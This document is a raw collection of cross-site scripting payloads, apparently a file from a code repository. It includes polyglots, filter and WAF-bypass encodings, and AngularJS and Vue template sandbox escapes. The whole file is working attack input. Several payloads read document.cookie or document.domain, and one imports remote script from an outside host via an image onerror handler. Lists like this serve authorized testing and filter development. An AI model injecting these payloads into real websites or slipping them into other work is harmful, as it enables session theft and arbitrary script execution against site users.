VasCript:/*-/*`/*\`/*&#039;/*&quot;/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//&lt;/stYle/&lt;/titLe/&lt;/teXtarEa/&lt;/scRipt/--!&gt;\x3csVg/&lt;sVg/oNloAd=alert()//&gt;\x3e
javascript:/*-- >]]>%>?></script></title></textarea></noscript></style></xmp>">[img=1,name=/alert(1)/.source]<img - /style=a:expression&#40&#47&#42'/- /*&#39,/**/eval(name)/*%2A///*///&#41;;width:100%;height:100%;position:absolute;-ms-behavior:url(#default#time2) name=alert(1)onerror=eval(name) src=1 autofocus onfocus=eval(name)onclick=eval(name) onmouseover=eval(name) onbegin=eval(name)background=javascript:eval(name)//>"
[1].find(confirm)
iframe/onload='this["src"]="javas&Tab;cript:al"+"ert``"';>
<img src onerror=import('//bo0om.ru/x/')>
<video><source onerror="javascript:javascript:alert(/AmoloHT/)">
<video onerror="javascript:javascript:alert(/AmoloHT/)"><source>
<form><button formaction="javascript:javascript:alert(/AmoloHT/)">X
<body oninput=javascript:alert(/AmoloHT/)><input autofocus>
<math href="javascript:javascript:alert(/AmoloHT/)">CLICKME</math> <math> <maction actiontype="statusline#http://google.com" xlink:href="javascript:javascript:alert(/AmoloHT/)">CLICKME</maction> </math>
<frameset onload=javascript:alert(/AmoloHT/)>
<table background="javascript:javascript:alert(/AmoloHT/)">
<!--<img src="--><img src=x onerror=javascript:alert(/AmoloHT/)//">
<comment><img src="</comment><img src=x onerror=javascript:alert(/AmoloHT/))//">
<![><img src="]><img src=x onerror=javascript:alert(/AmoloHT/)//">
<style><img src="</style><img src=x onerror=javascript:alert(/AmoloHT/)//">
<li style=list-style:url() onerror=javascript:alert(/AmoloHT/)> <div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:alert(/AmoloHT/)></div>
<head><base href="javascript://"></head><body><a href="/. /,javascript:alert(/AmoloHT/)//#">XXX</a></body>
<SCRIPT FOR=document EVENT=onreadystatechange>javascript:alert(/AmoloHT/)</SCRIPT>
<script /**/>/**/alert(/AmoloHT/)/**/</script /**/
&#34;&#62;<h1/onmouseover='\u0061lert(/AmoloHT/)'>
<iframe/src="data:text/html,<svg &#111;&#110;load=alert(/AmoloHT/)>">
<meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(/AmoloHT/)" http-equiv="refresh"/>
<form><iframe &#09;&#10;&#11; src="javascript&#58;alert(/AmoloHT/)"&#11;&#10;&#09;;>
<marquee onstart=\u0070r\u06f\u006dpt()>
<!--><script>confirm/**/()/**/</script>
"%3balert`1`%3b"
[1].map(alert) or (alert)(1)
ax6zt%2522%253e%253cscript%253ealert%2528document.domain%2529%253c%252fscript%253ey6uu6 -@naglinagli
<img src=x onerror="\u0061lert(1)"/>
<img src=x onerror="eval('\141lert(1)')"/>
<img src=x onerror="eval('\x61lert(1)')"/>
<a href="ja%0Dva%0Dscr%0Dipt:aler%0Dt(1)">
<strong><button popovertarget="x">click me</button><test onbeforetoggle="alert(document.domain)" popover id="x">aaa</test></strong>
<strong><button popovertarget="x"></button><test onbeforetoggle="alert(document.domain)" popover id="x"></test></strong>
";alert(0);//
onx+%00+onpointerenter%3dalert(domain)+x
"><input%252bTyPE%25253d"hxlxmj"%252bSTyLe%25253d"display%25253anone%25253b"%252bonfocus%25253d"this.style.display%25253d'block'%25253b%252bthis.onfocus%25253dnull%25253b"%252boNMoUseOVer%25253d"this['onmo'%25252b'useover']%25253dnull%25253beval(String.fromCharCode(99,111,110,102,105,114,109,40,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,41))%25253b"%252bAuToFOcus>
"/><svg onauxclick=&#x63&#x6F&#x5C&#x75&#x30&#x30&#x36&#x65&#x66&#x69&#x72&#x6D(\\1\\)>
%3csvg/onload=window%5b"al"+"ert"%5d`1337`%3e
<audio src(unknown) onerror="alert(document.cookie)">
\"><iframe/src=javascript:alert%26%23x000000028%3b)>
“=””’></><script></script><svg onload=alert(1)>
“ =”” ></><script></script><svg onload”=”alertonload=alert(1)””
*/</script><script>alert()/*
&lt;details%0Aopen%0AonToGgle%0A=%0Aabc=(co\u006efirm);abc%28%60xss%60%26%2300000000000000000041//
'href=javascript:alert()>click me<a/y='
<script ,>alert()</script>
\u0061\u006c\u0065\u0072\u0074()
onload=prompt`1`>
%5Cu0061%5Cu006C%5Cu0065%5Cu0072%5Cu0074%28%29
'`"//><script>alert(1)</script>
&#x25;5Cu0061&#x25;5Cu006C&#x25;5Cu0065&#x25;5Cu0072&#x25;5Cu0074&#x25;28&#x25;29
<s%08c%08r%08i%08p%08t>al%08ert%08()<%08/%08s%08c%08r%08i%08p%08t%08>
<img+src=1+onerror=alert(1)>&anything_else=test
test';alert`1`;a='test
alert = window["al"+"ert"]
<Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ==")>
\u003cimg\u0020src\u003dx\u0020onerror\u003d\u0022confirm(document.domain)\u0022\u003e
<img/src/onerror=alert//&NewLine;(2)>
<img/src/onerror=alert&sol;**&sol;(3)>
<svg/onload=window["al"+"ert"]`1337`>
javaScRipt:Alert(1)
{{constructor.constructor('alert(1)')()}}
{{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()}}
{}[['__proto__']]['x']=constructor.getOwnPropertyDescriptor;g={}[['__proto__']]['x'];{}[['__proto__']]['y']=g(''.sub[['__proto__']],'constructor');{}[['__proto__']]['z']=constructor.defineProperty;d={}[['__proto__']]['z'];d(''.sub[['__proto__']],'constructor',{value:false});{}[['__proto__']]['y'].value('alert(1)')()
onerror="x='ale';z='r';y='t';p='`XSS`';new constructor.constructor`zzz${`${x}${z}${y}${p}`}bbb`
"on{{click=prompt(document['cookie'])/*}}*/>
<video src=x onerror="prompt(xss">
Hh'><script>alert(1)</script>
<video src=x onerror="prompt(xss)">
<x @[_b.constructor`alert(1)`()]>
<x #[_c.constructor`alert(1)`()]>
<svg onload=prompt&#x000000028;document.domain)>
<video src=x onerror1="prompt(xss)">
Hh'><marquee loop=1 width=0 onfinish=pr\u006fmpt`_Y000!_`>Y000</marquee>
["');alert('1);//"]@xyz.xxx
'<00 foo="<a%20href="javascript:alert('XSS-Bypass')">XSS-CLick</00>--%20/
["');alert('XSS');//"]@xyz.xxx
{{0[a='constructor'][a]('alert(1)')()}}
{{$eval.constructor('alert(1)')()}}
{{constructor.constructor('alert(/XSS Stored!/)')()}}
<div v-html="''.constructor.constructor('alert(1)')()">a</div>
<x v-html=_c.constructor('alert(1)')()>
{{_c.constructor('alert(1)')()}}
<x v-if=_c.constructor('alert(1)')()>
{{'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)');}}
{{c=''.sub.call;b=''.sub.bind;a=''.sub.apply;c.$apply=$apply;c.$eval=b;op=$root.$$phase;$root.$$phase=null;od=$root.$digest;$root.$digest=({}).toString;C=c.$apply(c);$root.$$phase=op;$root.$digest=od;B=C(b,c,b);$evalAsync("astNode=pop();astNode.type='UnaryExpression';astNode.operator='(window.X?void0:(window.X=true,alert(1)))+';astNode.argument={type:'Identifier',name:'foo'};");m1=B($$asyncQueue.pop().expression,null,$root);m2=B(C,null,m1);[].push.apply=m2;a=''.sub;$eval('a(b.c)');[].push.apply=a;}}
{{c=''.sub.call;b=''.sub.bind;c.$apply=$apply;c.$eval=b;$root.$$phase=null;$root.$digest=$on; C=c.$apply(c);B=C(b,c,b);$evalAsync("astNode=pop();astNode.type='UnaryExpression';astNode.operator='alert(1)';astNode.argument={type:'Identifier'};");m1=$$asyncQueue.pop().expression;m2=B(C,null,m1);[].push.apply=m2;$eval('B(b)');}}
{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}
{{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join;$eval('x=alert(1)');}}
{{$on.constructor('alert("CodePrefer")')()}}
{{{{constructor.constructor('alert(\"XSS\")')()}}
{"<img onerror=confirm('xss_by_ibro')src/>":1}
{{'a'.constructor.prototype.charAt=''.valueOf;$eval("x='\"+(y='if(!window\u002ex)alert(window\u002ex=1)')+eval(y)+\"'");}}}}
{{[].pop.constructor&#40'alert\u00281\u0029'&#41&#40&#41}}
{{constructor.constructor(alert(1))()}}
{{constructor.constructor(valueOf.name.constructor.fromCharCode(97,108,101,114,116,40,49,41,10))()}}
{{c=%27%27.sub.call;b=%27%27.sub.bind;a=%27%27.sub.apply;c.$apply=$apply;c.$eval=b;op=$root.$$phase;$root.$$phase=null;od=$root.$digest;$root.$digest=({}).toString;C=c.$apply(c);$root.$$phase=op;$root.$digest=od;B=C(b,c,b);$evalAsync(%22astNode=pop();astNode.type=%27UnaryExpression%27;astNode.operator=%27(window.X?void0:(window.X=true,alert(document.domain)))+%27;astNode.argument={type:%27Identifier%27,name:%27foo%27};%22);m1=B($$asyncQueue.pop().expression,null,$root);m2=B(C,null,m1);[].push.apply=m2;a=%27%27.sub;$eval(%27a(b.c)%27);[].push.apply=a;}}
{{constructor.constructor(a=document;confirm(a.domain))()}}
x=1}}};alert(1)//
<input ng-cut=$event.composedPath()|orderBy:'(y=alert)(1)'>
{{([].toString()).constructor.prototype.charAt=[].join;$eval(([].toString()).constructor.fromCodePoint([120],[61],[49],[125],[125],[125],[59],[97],[108],[101],[114],[116],[40],[49],[41],[47],[47]));}}
{{constructor.constructor("alert(0)")()}}
${document.domain}`%26it;/script>'>
1&toString().constructor.prototype.charAt%3d[].join;[1]|orderBy:toString().constructor.fromCharCode(120,61,97,108,101,114,116,40,49,41)=1
Set.constructor('ale'+'rt(13)')();
Set.constructor`al\x65rt\x2814\x29```;
<x ng-app>{{constructor.constructor('alert(1)')()}}
\”}})})-confirm`1`;({{/*///
{{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()
<input autofocus ng-focus="$event.composedPath()|orderBy:'[].constructor.from([1],alert)'">
<div ng-app ng-csp><div ng-focus="x=$event;" id=f tabindex=0>foo</div><div ng-repeat="(key, value) in x.view"><div ng-if="key == 'window'">{{ [1].reduce(value.alert, 1); }}</div></div></div>
<input id=x ng-focus=$event.composedPath()|orderBy:'(z=alert)(1)'>}}
<input id=x ng-focus=$event.composedPath()|orderBy:'(z=alert)(1)'>
{{'a'[{toString:[].join,length:1,0:'__proto__'}].charAt=''.valueOf;$eval("x='"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+"'");}}
{{(_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'alert(1)')()}}
{{'a'.constructor.prototype.charAt=''.valueOf;$eval("x='\"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+\"'");}}
{{c='%27%27.sub.call;b='%27%27.sub.bind;a='%27%27.sub.apply;c.$apply=$apply;c.$eval=b;op=$root.$$phase;$root.$$phase=null;od=$root.$digest;$root.$digest=({}).toString;C=c.$apply(c);$root.$$phase=op;$root.$digest=od;B=C(b,c,b);$evalAsync("astNode=pop();astNode.type='UnaryExpression';astNode.operator='(window.X?voide:(window.X=true,alert(document.domain)))+';astNode.argument={type:'Identifier',name:'foo'};");m1=B($$asyncQueue.pop().expression,null,$root);m2=B(C,null,m1);[].push.apply=m2;a='%27%27.sub;$eval('a(b.c)'):[].push.apply=a:}}
{{c='%27%27.sub.call;b='%27%27.sub.bind;a='%27%27.sub.apply;c.$apply=$apply;c.$eval=b;op=$root.$$phase;$root.$$phase=null;od=$root.$digest;$root.$digest=({}).toString;C=c.$apply(c);$root.$$phase=op;$root.$digest=od;B=C(b,c,b);$evalAsync('alert(document.domain)');m1=B($$asyncQueue.pop().expression,null,$root);m2=B(C,null,m1);[].push.apply=m2;a='%27%27.sub;$eval('a(b.c)'):[].push.apply=a:}}
{{c='%27%27.sub.call;b='%27%27.sub.bind;a='%27%27.sub.apply;c.$apply=$apply;c.$eval=b;op=$root.$$phase;$root.$$phase=null;od=$root.$digest;$root.$digest=({}).toString;C=c.$apply(c);$root.$$phase=op;$root.$digest=od;B=C(b,c,b);$evalAsync('prompt("Enter something:", document.domain)');m1=B($$asyncQueue.pop().expression,null,$root);m2=B(C,null,m1);[].push.apply=m2;a='%27%27.sub;$eval('a(b.c)'):[].push.apply=a:}}
{{constructor.constructor('eval(atob("YWxlcnQoMSk="))')()}}
{{constructor.constructor('prompt(1)')()}}
{{''.constructor.constructor('alert(1)')()}}
{{'a'.constructor('alert(1)')()}}
{{'a'.constructor.constructor('alert(1)')()}}
{{toString.constructor.prototype.charAt=toString.constructor.prototype.substr;alert(toString.constructor.fromCharCode(97,108,101,114,116,40,49,41))}}
Reference in New Issue Copy Permalink